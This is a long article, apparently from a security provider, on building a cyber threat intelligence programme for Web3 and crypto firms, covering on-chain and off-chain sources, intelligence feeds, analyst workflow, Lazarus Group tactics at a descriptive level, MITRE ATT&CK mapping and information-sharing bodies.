The Intelligence Gap in Web3 Security
The dominant security posture across the crypto industry is reactive. An exploit occurs, funds drain, and a post-mortem appears days later attributing the loss to a reentrancy bug, a compromised private key, or a social engineering attack on a developer. The post-mortem is thorough. The response is swift. The funds are gone. This cycle repeats with remarkable consistency across protocols, exchanges, and infrastructure providers at every stage of maturity.
The problem is not a lack of security spending. Many Web3 firms invest substantially in smart contract audits, penetration testing, and bug bounty programmes. The problem is a structural absence of proactive threat intelligence: the organisational capability to collect, analyse, and act on information about threats before those threats materialise into incidents. In traditional financial services and defence sectors, this capability is called a cyber threat intelligence (CTI) programme, and it is considered a foundational element of any serious security function. In Web3, it remains rare.
The consequences of this gap are measurable. According to SlowMist's 2025 annual review, the majority of losses in the sector stem not from novel zero-day vulnerabilities but from well-documented attacker behaviours: phishing, key theft, supply chain poisoning, and social engineering. These are the exact categories of threat that a functioning CTI programme is designed to detect and disrupt in advance. The attackers, including state-sponsored groups operating with the resources and patience of a professional intelligence service, conduct extensive reconnaissance before any on-chain activity becomes visible. Firms that lack a CTI capability do not see them coming.
This article sets out how to build a structured blockchain threat intelligence programme. It is written for the security director, CISO, or founder who recognises the gap and wants a clear operational framework for closing it.
Defining CTI in the Web3 Context
Cyber threat intelligence is the collection, analysis, and operationalisation of information about the threats facing an organisation. In the Web3 context, those threats span a uniquely broad attack surface: smart contract logic, private key infrastructure, developer workstations, cloud environments, social media accounts used for community management, exchange custody relationships, and the human operators who sit across all of these. CTI for Web3 must address all of these layers simultaneously.
The defining characteristic of mature CTI is the distinction between raw data and finished intelligence. Raw data is a list of malicious wallet addresses. Finished intelligence is an assessment of which threat actor controls those wallets, what their historical targeting pattern looks like, what attack phase they are likely in, and what your organisation should do differently in the next seventy-two hours as a result. The difference between data and intelligence is analysis, context, and a clear connection to a decision that needs to be made.
Web3 CTI adds an additional dimension absent from traditional enterprise security: the blockchain ledger itself is a publicly queryable source of threat data. On-chain activity leaves a permanent, transparent record that a skilled analyst can use to reconstruct attacker behaviour, trace fund flows, identify infrastructure reuse, and predict next moves. No equivalent capability exists in most other sectors. Combined with conventional off-chain intelligence sources, this creates a uniquely powerful analytical environment for security teams willing to build the capability.
"Most crypto losses are not caused by unknown vulnerabilities. They are caused by known attacker behaviour that nobody was watching for. A CTI programme changes that equation."
The Three Tiers of Threat Intelligence
A well-structured CTI programme produces intelligence at three distinct tiers, each serving a different audience and time horizon.
Strategic Intelligence
Strategic intelligence is produced for board-level and executive audiences. It addresses the macro threat landscape: which nation-state actors are actively targeting crypto infrastructure, what sectors of the industry are experiencing elevated attack rates, and how the risk profile of the organisation is changing over time. Strategic intelligence informs resource allocation, insurance positioning, regulatory reporting, and acquisition due diligence. It is typically produced monthly or quarterly, written in plain language, and free of technical jargon. Its primary audience is leadership teams who are not security specialists but whose decisions determine the organisation's overall risk exposure.
For a Web3 firm, strategic intelligence might include a quarterly briefing on DPRK-linked activity targeting crypto exchanges, an assessment of the regulatory risk associated with particular threat actor groups, or an analysis of how recent large-scale exploits affect the firm's own threat surface through shared dependencies or partner relationships.
Operational Intelligence
Operational intelligence is produced for security management and incident response teams. It provides situational awareness about active campaigns, ongoing threat actor operations, and the contextual information teams need to prioritise their response activities. Operational intelligence typically has a time horizon of days to weeks and answers questions such as: is there an active phishing campaign targeting crypto firms using a particular lure? Are there indicators suggesting a threat actor has compromised a peer organisation and may pivot to ours? What does the current targeting pattern of a specific adversary group suggest about their near-term intentions?
This tier bridges the gap between the board-level risk picture and the technical indicators used by analysts and detection engineers. It gives the security team the contextual awareness to make better triage decisions and pre-position their defences appropriately.
Tactical Intelligence
Tactical intelligence is the most granular tier. It consists of technical indicators of compromise (IoCs): specific IP addresses, wallet addresses, domain names, file hashes, and behavioural signatures associated with known threat actors. Tactical intelligence feeds directly into detection and monitoring tools, blocklists, and alert rules. It has a short shelf life, because threat actors rotate infrastructure frequently, but it provides the raw material for real-time detection.
For Web3, tactical intelligence includes on-chain indicators such as wallet addresses associated with known theft operations, contract addresses used in past exploits, and transaction patterns characteristic of specific attack methods. It also includes off-chain indicators: phishing domains registered to mimic your brand, malicious npm packages designed to target your developer team, and infrastructure overlaps linking different attack campaigns to the same threat actor.
On-Chain Threat Intelligence Sources
The blockchain ledger is the most distinctive intelligence source available to Web3 security teams. Every transaction is public, permanent, and queryable. Skilled analysts can extract a remarkable amount of adversary insight from on-chain data alone.
Blockchain Analytics Platforms
Platforms such as Chainalysis and Merkle Science provide structured intelligence about wallet attribution, fund flows, and transaction risk. These tools maintain large databases of address labels, linking on-chain addresses to known entities including exchanges, mixers, sanctioned entities, and threat actor clusters. For a CTI programme, they serve two primary functions: pre-transaction screening of counterparties to detect exposure to illicit funds, and post-incident tracing to follow stolen funds and identify the infrastructure used by attackers.
Elliptic, another leading provider, combines on-chain and off-chain data to link blockchain activity to real-world entities. Its threat intelligence offering has grown to encompass over thirteen years of ground-truth evidence connecting on-chain addresses to documented threat actors and criminal organisations. For a mid-size Web3 firm, a subscription to one of these platforms provides immediate uplift to the operational and tactical tiers of the intelligence programme.
On-Chain Anomaly Detection
Beyond static address databases, on-chain anomaly detection platforms monitor live blockchain activity for behavioural signatures associated with attacks in progress. Platforms such as Hexagate use machine learning models trained on historical exploit data to identify attack patterns in pending transactions before they finalise on-chain. This pre-execution visibility provides a critical window for automated response, such as pausing a vulnerable contract or alerting the security team in time to act.
SlowMist's MistEye platform offers a complementary approach, providing a continuously updated threat intelligence database with over 27,000 categorised threats ranging from critical to medium severity, along with a live feed of new discoveries and a comprehensive archive of 2,006 documented hack events totalling approximately $36.9 billion in cumulative losses. The depth of historical data makes it a valuable resource for pattern analysis and threat actor profiling.
Mempool Monitoring
The mempool, the pool of pending but unconfirmed transactions on Ethereum and other EVM-compatible networks, is a real-time intelligence source for detecting attack activity before it lands on-chain. Front-running and sandwich attacks are visible in the mempool through distinctive signatures: anomalous gas price spikes, nonce sequencing irregularities, and transaction bundles structured to bracket a target transaction with buy and sell orders. MEV-related extraction costs DeFi protocols hundreds of millions of dollars annually. A security team monitoring the mempool for known attack signatures can detect ongoing exploitation activity, trigger automated circuit breakers, or alert protocol teams in time to mitigate damage.
Mempool monitoring also provides advance warning of state-change attacks targeting specific contracts. When an attacker pre-computes an exploit and submits a transaction to the mempool, the window between submission and block inclusion can range from seconds to minutes depending on gas pricing. Systems that monitor mempool activity against known vulnerable contract signatures can detect these in-flight attacks and, where smart contract architecture permits, respond before finalisation.
Known Threat Actor Wallet Monitoring
Tracking the on-chain movements of known threat actor wallets is one of the highest-signal activities available to a CTI team. Following a major exploit, blockchain analysts typically identify the attacker's primary wallet address within hours. These addresses are then published through community intelligence sources and, for significant incidents involving sanctions exposure, added to OFAC and equivalent lists. A CTI programme that maintains a watchlist of confirmed threat actor addresses and monitors them for activity can detect patterns including infrastructure staging prior to a new attack, laundering activity indicating an imminent attempt to cash out, and address clustering that reveals new wallets belonging to the same actor.
Lazarus Group wallets, for example, exhibit distinctive on-chain behaviour patterns including multi-hop routing through mixers, bridge hopping across chains to fragment tracking, and holding periods that follow consistent timing profiles. Analysts who understand these patterns can identify likely Lazarus-affiliated activity with meaningful confidence even when the specific wallets are new.
Off-Chain Threat Intelligence Sources
On-chain data captures what has already happened, or is in the process of happening. Off-chain intelligence sources capture the planning, recruitment, and infrastructure-building that precede any on-chain action. For a comprehensive CTI programme, off-chain sources are often more valuable for early warning.
Dark Web and Threat Actor Forum Monitoring
Threat actors involved in crypto theft communicate through a range of channels including dark web forums, private Telegram groups, and Discord servers dedicated to exploit discussion, credential trading, and attack coordination. Monitoring these channels provides advance notice of campaigns being planned, credentials being sold that may include those of your staff, and new attack tools being developed or sold as services.
Dark web monitoring for crypto firms focuses particularly on: credential marketplaces where stolen login data is sold including exchange accounts and internal tool credentials; forum discussions referencing specific protocols or teams by name; and the sale of compromised access to internal systems, sometimes referred to as "initial access brokers" advertising their wares before a full attack is executed.
Telegram and Discord Channel Intelligence
A significant proportion of Web3 threat actor communication occurs on Telegram. Private channels and groups are used for coordinating phishing campaigns, sharing exploit toolkits, recruiting participants for rug pull schemes, and organising social engineering operations against specific targets. Public channels operated by threat actors sometimes provide inadvertent intelligence through the artefacts they share. Monitoring relevant Telegram channels, including those operated by known scam networks, provides a continuous stream of low-to-medium confidence intelligence that, when combined with other sources, can provide meaningful advance warning of campaigns in progress.
Social Engineering Campaign Monitoring
The majority of successful attacks against crypto firms in recent years have involved a social engineering component. Attackers research targets on LinkedIn, GitHub, and X (formerly Twitter), identify employees with high-value access, and construct highly personalised approaches. Monitoring for social engineering indicators includes: tracking new LinkedIn profiles that approach your senior staff; identifying job postings on external platforms advertising roles that do not exist within your organisation (a Lazarus Group tactic used to bait developers); and watching for accounts impersonating your leadership or brand in direct message campaigns targeting staff or community members.
Phishing Domain Tracking
Phishing domain monitoring is one of the highest-return off-chain intelligence activities for any crypto firm. Attackers regularly register domains that closely mimic a target's legitimate domain, using typosquatting, homoglyph substitution, or subdomain manipulation to create convincing lures. Many of these domains are registered days or weeks before a campaign launches, providing an early warning window if the firm is actively monitoring new domain registrations for brand similarity.
Certificate transparency logs provide a publicly accessible, near-real-time feed of new TLS certificates being issued across the internet. Parsing certificate transparency logs for domains resembling your brand, your partners' brands, and your product names is a low-cost, high-signal intelligence activity that can surface phishing infrastructure before it is operationalised against your users or staff.
Paste Sites and Code Repository Scanning
Paste sites such as Pastebin and similar platforms are routinely used by attackers to exfiltrate and share stolen data including private keys, seed phrases, API credentials, and database dumps. Monitoring paste sites for references to your organisation name, domain, known wallet addresses, or contract addresses provides early warning of credential theft that has not yet been operationalised.
Code repositories represent an equally critical monitoring target. Developers frequently commit sensitive material to public GitHub repositories: hardcoded private keys, API credentials, internal configuration files, and environment variables containing wallet seed phrases. An automated scanning programme covering public repositories associated with your team and contractors, combined with historical commit scanning for any repositories that were previously private, addresses one of the most consistently exploited intelligence gaps in the industry. SlowMist's 2025 quarterly data identified malicious GitHub repository poisoning as one of the top attack vectors of the year.
Threat Intelligence Feeds Relevant to Web3
A CTI programme does not need to generate all of its own intelligence. Several publicly available and community-maintained feeds provide structured threat data specifically relevant to Web3 security teams.
DeFiHackLabs on GitHub is a community-maintained repository tracking Web3 security incidents with technical detail including proof-of-concept exploit code, attacker wallet addresses, and timeline reconstructions. It is one of the most comprehensive free resources available for mapping attack patterns and maintaining an awareness of which vulnerability classes are actively being exploited in the wild.
Rekt News provides narrative post-mortems of significant DeFi exploits, with consistent coverage of attack mechanics, financial impact, and attacker behaviour. The Rekt database is searchable and provides historical context for understanding how specific vulnerability patterns have evolved over time. Its weekly security brief aggregates the most significant incidents and intelligence items from across the ecosystem.
The SlowMist Hacked database documents over 2,000 blockchain attack events totalling approximately $36.9 billion in losses, with each entry categorised by attack method, protocol type, and financial impact. The database is queryable and provides both historical pattern analysis and near-real-time incident tracking. SlowMist also operates the InMist Threat Intelligence Network, a collaborative feed that aggregates malicious addresses and phishing infrastructure from across the global security community.
For organisations of sufficient scale, Crypto ISAC provides a vetted, members-only threat intelligence sharing environment. In January 2026, Coinbase expanded its integration with Crypto ISAC to provide continuous, automated sharing of high-confidence threat indicators with the member community. Ripple has since contributed DPRK-linked threat intelligence to the same network, including wallet addresses, fraud-linked domains, and identity signals tied to North Korean infiltration schemes. The Crypto ISAC API normalises both Web2 and Web3 threat indicators into a unified format suitable for direct integration with security tooling.
The Security Alliance (SEAL) ISAC offers a free, crypto-native information sharing environment operating on OpenCTI, with early participants including security teams from Chainalysis, the Ethereum Foundation, MetaMask, Polygon, and Uniswap Labs. SEAL-ISAC provides automated threat feeds curated by analysts as well as peer-contributed intelligence from member organisations. For smaller firms unable to afford commercial feed subscriptions, SEAL-ISAC represents a practical entry point into structured intelligence sharing.
Building an Analyst Workflow
Subscribing to threat feeds does not constitute a CTI programme. The defining capability of a mature CTI function is the analyst workflow that transforms raw data into finished, actionable intelligence. Without this workflow, feeds generate noise rather than signal.
Triage
The first step in any analyst workflow is triage: the systematic review of incoming data to determine what is relevant, credible, and time-sensitive. A CTI analyst reviewing daily feed outputs applies a consistent set of questions: does this indicator relate to a threat actor or campaign known to target organisations like ours? Does it involve infrastructure, tactics, or personnel relevant to our environment? Is the confidence level sufficient to act on, or does it require further enrichment before being operationalised?
Effective triage requires documented intelligence requirements: a clear articulation of what your organisation needs intelligence about, prioritised by risk. Without documented requirements, triage becomes a matter of individual analyst judgement, which is inconsistent and difficult to audit.
Enrichment
Raw indicators need context before they can drive decisions. A wallet address flagged as suspicious is more useful when enriched with information about which threat actor cluster it belongs to, when it was first observed, what it has transacted with, and whether it appears in any sanctions databases. A phishing domain is more actionable when linked to the broader infrastructure campaign it belongs to, including other domains registered using the same registrar, hosting provider, or registration pattern.
Enrichment tools for Web3 CTI include blockchain analytics platforms for on-chain context, domain intelligence tools such as PassiveTotal or Shodan for infrastructure analysis, and internal knowledge bases documenting your organisation's own previous exposure to specific threat actors or campaigns.
Production and Dissemination
Finished intelligence products need to reach the right audience in the right format. Tactical IoCs go directly into detection tooling or blocklists with minimal latency. Operational intelligence is packaged as brief written summaries, typically one to two pages, delivered to the security management team on a weekly or as-needed basis. Strategic intelligence is produced monthly or quarterly as a formal written product for leadership review.
The common failure mode is producing intelligence that never reaches a decision-maker. CTI outputs must be integrated into existing security processes, team rituals, and leadership reporting cycles. Intelligence that sits in a threat feed dashboard and is never read provides no value.
Integration with Incident Response
A CTI programme delivers its greatest value when it is tightly integrated with incident response planning. The two functions are mutually reinforcing: intelligence shapes the response runbooks and pre-positions the team for known threats, while incident investigations generate new intelligence about attacker behaviour and infrastructure that enriches the programme's future outputs.
For known threat actors with documented TTPs, the CTI programme enables pre-positioning: defining in advance the detection rules, escalation procedures, and response actions appropriate to that specific adversary. When indicators of Lazarus Group activity are detected in your environment, for example, the team should not be improvising. They should have a pre-written playbook based on the known characteristics of a Lazarus Group intrusion: what persistence mechanisms to look for, what data targets the group typically prioritises, what their typical exfiltration timing looks like, and which response actions are most likely to contain the incident before funds are moved.
This pre-positioning requirement drives one of the key analytical tasks of a CTI programme: producing detailed threat actor profiles for the adversaries most likely to target your organisation. For Web3 firms of any meaningful size or visibility, that list almost certainly includes Lazarus Group.
Building a capable security operations centre requires this intelligence integration to function at full effectiveness. Detection rules without adversary context are blunt instruments. Runbooks without threat actor profiles are generic to the point of uselessness. The CTI programme provides the adversary-specific context that turns a competent security team into a genuinely threat-informed one.
Lazarus Group: Threat Profile and TTPs
Lazarus Group, the North Korean state-sponsored threat actor assessed to be operating under the auspices of the Reconnaissance General Bureau, has caused more documented financial damage to the crypto sector than any other single adversary. Conservative estimates attribute at least $3 billion in crypto theft to Lazarus-affiliated operations between 2017 and 2025, with 2025 alone contributing major incidents including the $1.4 billion Bybit breach. For any Web3 firm operating at scale, building a detailed Lazarus Group threat profile is not optional.
Initial Access Techniques
Lazarus Group's most consistently observed initial access technique against crypto firms is spear phishing with high-personalisation lures. These campaigns are not generic phishing emails. They reference the target's specific role, current projects, professional connections, and interests. The group invests significant effort in open-source reconnaissance on LinkedIn, GitHub, and X before approaching a target, constructing lures that appear credible to even security-aware recipients.
The fake job offer campaign, sometimes referred to as "Operation Dream Job," is a signature Lazarus technique. Threat actors pose as recruiters from credible technology and financial firms, approaching developers, DevOps engineers, and security staff with attractive employment offers. The recruitment process is conducted over multiple interactions to build rapport and credibility, before eventually delivering a malware payload disguised as a coding assessment, technical interview document, or onboarding package.
In 2025, Lazarus Group expanded their supply chain attack surface aggressively, publishing malicious packages to the npm and PyPI ecosystems. These packages, designed to mimic legitimate developer utilities, executed malware that scanned for and exfiltrated MetaMask wallet data, environment variables, and private key material. ORKL's whitepaper documenting this campaign identified over 234 unique malicious packages with a potential victim pool exceeding 36,000 developers. This represents a fundamental evolution: rather than targeting a firm directly, the group poisons the upstream dependencies that developers across hundreds of firms consume simultaneously.
Persistence and Lateral Movement
Once initial access is achieved, Lazarus Group typically establishes persistent access through backdoored tooling, scheduled tasks, or modified legitimate binaries. They exhibit a high tolerance for long dwell time, sometimes remaining undetected inside a network for weeks or months while conducting internal reconnaissance and mapping the full scope of accessible keys and custody infrastructure. This patience is a deliberate operational choice: the group prioritises a complete understanding of the target's key management architecture before triggering any visible theft event.
Lateral movement within compromised environments targets the specific personnel and systems with access to private keys, hot wallet infrastructure, and administrative controls over smart contract upgrade mechanisms. The group is known to specifically target engineers with access to deployment keys, treasury multisig signers, and infrastructure administrators with cloud console access.
For a detailed treatment of the operational security failures that expose crypto firms to this threat actor, see our analysis of Lazarus Group operational security failures.
Exfiltration and Laundering
Lazarus Group's post-theft money laundering operations are sophisticated and adaptive. Stolen funds are typically routed through multiple chains using cross-chain bridges, fragmented across numerous intermediate addresses, processed through mixers and privacy protocols, and eventually consolidated for conversion to fiat through over-the-counter brokers and exchanges with weak compliance controls. The group has demonstrated the ability to launder hundreds of millions of dollars across complex multi-chain paths within days of an initial theft event, making rapid response and asset freezing critical in the immediate aftermath of an incident.
MITRE ATT&CK Applied to Blockchain Threats
The MITRE ATT&CK framework provides a structured, community-maintained taxonomy of adversary tactics and techniques. Originally developed for enterprise IT environments, the framework has been extended and adapted for cloud, mobile, and operational technology environments. For Web3 security teams, ATT&CK provides a common language for describing attacker behaviour, a reference library for gap analysis, and a structured basis for threat-informed red team exercises.
Mapping observed attacker behaviour to ATT&CK identifiers serves several practical purposes. First, it enables consistent documentation of threats that can be understood by analysts regardless of their specific background. Second, it provides a structured basis for comparing the TTPs of different threat actors, identifying which adversaries share infrastructure or methodologies. Third, and most practically, it provides a direct mapping from observed adversary behaviour to the defensive controls that MITRE recommends as mitigations, enabling a security team to prioritise their defensive investment based on which techniques are most relevant to their specific threat landscape.
For Web3 firms, the most operationally relevant ATT&CK technique categories include: Initial Access (particularly phishing, supply chain compromise, and valid accounts); Execution (command-line execution via developer tooling, malicious npm scripts); Persistence (boot or logon initialisation scripts, scheduled tasks); Credential Access (credentials from files and configuration stores, which in Web3 translates directly to key material theft); and Exfiltration (automated exfiltration to cloud storage, which covers the pattern of malicious packages that immediately send stolen data to attacker-controlled servers).
Maintaining an internal ATT&CK mapping updated as new threat intelligence is produced creates a continuously improving picture of which defensive controls are being tested by active adversaries and which gaps remain unaddressed. This mapping feeds directly into detection engineering, enabling the team to write detection rules targeted at the specific techniques most likely to be used against them. Combined with robust crypto logging and SIEM monitoring, ATT&CK-informed detection rules significantly improve the signal-to-noise ratio of security alerts.
Threat Intelligence Sharing and ISACs
No single organisation has full visibility into the threat landscape. Threat actors operate across multiple targets simultaneously, and the indicators, TTPs, and contextual information that one firm observes may be exactly what another firm needs to detect an attack they are currently experiencing. Structured information sharing through trusted peer networks and formal ISACs multiplies the effectiveness of every participant's intelligence capability at marginal additional cost.
The Crypto ISAC is the primary formal information sharing organisation for the digital assets sector. Founded by a consortium of leading exchanges and blockchain firms, it operates as a neutral, vetted hub for distributing sensitive intelligence under controls designed to protect confidentiality. The January 2026 expansion of Coinbase's automated threat feed and Ripple's contribution of DPRK-linked intelligence represent a maturation of the Crypto ISAC model toward the kind of continuous, automated sharing that characterises the most effective financial sector ISACs.
The U.S. Department of the Treasury announced in April 2026 an initiative to share actionable cybersecurity threat intelligence directly with U.S. digital asset firms, extending a category of intelligence-sharing previously reserved for traditional financial institutions. For firms operating within a U.S. regulatory perimeter, this creates an additional formal channel for government-sourced threat intelligence relevant to the crypto sector.
For smaller firms or those in jurisdictions without access to formal ISAC membership, community-level sharing through trusted bilateral relationships with peer security teams, contribution to open-source intelligence repositories such as DeFiHackLabs and SlowMist's InMist network, and participation in the SEAL community provide meaningful sharing benefits. The principle is the same regardless of the formality of the channel: no firm is more secure for hoarding indicators it could share with peers who face the same adversaries.
Developing the internal processes and governance to participate in formal intelligence sharing requires modest but non-trivial investment. The organisation needs a defined policy for what intelligence can be shared externally, a process for anonymising sensitive operational details before sharing, and a named point of contact for inbound intelligence from partner organisations. These are achievable even for small security teams and pay disproportionate returns relative to the effort required.
Staffing, Tooling, and the Minimal Viable CTI Function
A common barrier to building a CTI programme is the perception that it requires a large, dedicated team and significant budget. In practice, a minimal viable CTI function for a mid-size Web3 firm can be built with modest resources, provided the operational scope is defined clearly and the investment is focused on the highest-return activities.
The Minimal Viable Team
A single dedicated analyst, or a security generalist with defined CTI responsibilities allocated at roughly thirty to forty percent of their time, can deliver substantial value if supported by the right processes and tools. The critical requirement is consistency: intelligence work requires regular, sustained attention rather than episodic bursts. A programme that produces a thorough monthly report but does nothing in between is less valuable than one that performs daily feed triage and weekly enrichment activities even if those activities are individually brief.
As the programme matures, dedicated analyst capacity becomes more important. The realistic minimum for a firm managing significant on-chain treasury value or operating critical DeFi infrastructure is one full-time analyst, with access to part-time support from security engineers for detection rule implementation and from legal or compliance for sanctions-related intelligence handling.
Build vs. Buy
Most Web3 firms at the startup or growth stage are better served by a combination of commercial feed subscriptions and managed CTI services than by attempting to build a fully in-house capability. Commercial blockchain analytics platforms, phishing domain monitoring services, and managed dark web monitoring providers can provide comprehensive coverage across the major intelligence domains for a fraction of the cost of hiring the analysts required to source the same intelligence independently.
The in-house component that cannot be outsourced is the integration of external intelligence into internal processes. A managed service can tell you that your brand has been mimicked by three new phishing domains. Only your own team can ensure that information reaches your community managers, updates your detection rules, and is briefed to the relevant leadership. The decision logic, the institutional context, and the connection between intelligence and action must remain internal.
For organisations that cannot justify the investment in an internal capability, a structured engagement with a specialist provider who can deliver cyber threat intelligence for crypto firms as a managed service provides the benefits of a functioning CTI programme without requiring the internal headcount to run it. The key questions when evaluating such a provider are whether they can deliver Web3-specific intelligence combining on-chain and off-chain sources, whether their outputs integrate with your existing security tooling, and whether their analyst team has genuine expertise in the threat actors most relevant to your sector.
Tooling Priorities
For a firm building a CTI capability from scratch, the tooling priorities in order of return on investment are: a blockchain analytics subscription for on-chain wallet monitoring and fund flow analysis; a phishing domain monitoring service covering certificate transparency logs and domain registration data; access to at least one structured threat intelligence platform such as MISP or OpenCTI for storing and enriching indicators; and membership of SEAL-ISAC or Crypto ISAC for peer intelligence sharing.
The integration of these tools with the firm's SIEM and alerting infrastructure closes the loop between intelligence collection and operational detection. An indicator that sits in a threat feed database but never reaches a detection rule or analyst alert has no operational value. The tooling stack must be designed with this integration in mind from the outset.
Security teams building out this function for the first time often find that the human and process elements constrain outcomes more than the tooling. The most sophisticated analytical platform produces no value if there is no defined workflow for what happens when an analyst flags a high-confidence indicator. Investing in process documentation and analyst workflow design before expanding the tooling stack is consistently the higher-return choice.
Frequently Asked Questions
What is cyber threat intelligence in the context of blockchain and Web3?
Cyber threat intelligence (CTI) in Web3 is the systematic collection, analysis, and operationalisation of information about adversaries, attack methods, and indicators of compromise relevant to crypto infrastructure, personnel, and protocols. Unlike traditional CTI, it combines on-chain data sources such as blockchain analytics and wallet tracking with off-chain sources including dark web monitoring, Telegram channel surveillance, and phishing domain tracking. The output is actionable intelligence that security teams can use to pre-position defences, update detection rules, and brief leadership before an attack materialises rather than after.
What is the difference between on-chain and off-chain threat intelligence for crypto firms?
On-chain threat intelligence is derived directly from blockchain data: monitoring known threat actor wallet movements, anomaly detection in transaction patterns, mempool surveillance for front-running and sandwich attack signatures, and tracking fund flows following an exploit. Off-chain threat intelligence covers everything outside the blockchain ledger: dark web forums, Telegram and Discord channels used by threat actors, phishing domain registrations, paste site postings of leaked credentials, social engineering campaign monitoring, and code repository scans for hardcoded private keys or leaked secrets. An effective CTI programme integrates both layers, because most attacks are planned and resourced off-chain before any on-chain activity becomes visible.
What are the known tactics and techniques used by Lazarus Group against crypto firms?
Lazarus Group, the North Korean state-sponsored threat actor, targets crypto firms with a consistent set of tactics. These include spear-phishing campaigns with highly personalised lures referencing the target's specific role and projects; fake job offer operations where threat actors pose as recruiters from credible firms and deliver malware through interview task documents or coding challenges; social engineering of developers and DevOps staff to obtain credentials or install backdoors; and supply chain poisoning through malicious npm and PyPI packages that exfiltrate environment variables and crypto wallet data. The group exhibits long dwell times inside compromised networks, sometimes operating undetected for weeks or months before triggering a theft event. Groups aligned with Lazarus have been linked to some of the largest single-incident losses in crypto history.
How does MITRE ATT&CK apply to blockchain and crypto security?
The MITRE ATT&CK framework provides a structured taxonomy of adversary tactics and techniques that security teams can use to map observed attacker behaviour to documented methods and then identify corresponding defensive controls. For crypto firms, the framework applies at the infrastructure layer: initial access via phishing and supply chain compromise, execution via malicious scripts delivered through developer tooling, persistence through backdoored dependencies, credential access targeting private keys and seed phrases, and exfiltration of wallet data to attacker-controlled servers. By mapping known threat actor TTPs to ATT&CK identifiers, a security team can prioritise defensive gaps, write detection rules tuned to observed patterns, and conduct red team exercises that accurately simulate realistic adversary behaviour.
How should a Web3 firm get started building a threat intelligence programme?
A practical starting point is to define intelligence requirements before acquiring any tooling. What decisions does your security team or board need to make, and what information would help them make better decisions faster? From there, map your critical assets: smart contracts, private keys, admin wallets, developer workstations, and cloud infrastructure. Subscribe to free and low-cost feeds first: DeFiHackLabs on GitHub, the SlowMist Hacked database, Rekt News, and SEAL-ISAC if eligible. Assign a named analyst responsible for weekly triage even if part-time. Establish a structured process for converting raw data into finished intelligence products: brief summaries with a confidence rating, relevant TTPs, and recommended actions. Finally, integrate intelligence outputs into your incident response runbooks so that when a known threat actor pattern is observed, the team already has a playbook ready.